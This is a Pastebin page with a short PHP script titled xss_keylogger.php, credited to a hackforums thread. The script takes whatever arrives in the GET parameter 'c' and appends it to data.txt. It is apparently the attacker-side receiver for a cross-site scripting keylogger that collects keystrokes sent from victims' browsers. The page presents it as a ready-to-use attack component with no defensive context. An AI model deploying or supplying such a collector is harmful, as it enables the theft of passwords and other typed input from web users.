moemyintshein

xss_keylogger.php

Mar 13th, 2017
46
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. keylogger.php
  4. http://www.hackforums.net/showthread.php?tid=2540448
  5. tux1
  6.  
  7. Thanks to
  8. http://wiremask.eu/
  9. */
  10.  
  11. if(!empty($_GET['c'])) {
  12.     $logfile = fopen('data.txt', 'a+');
  13.     fwrite($logfile, $_GET['c']);
  14.     fclose($logfile);
  15. }
  16. ?>
Add Comment
Please, Sign In to add comment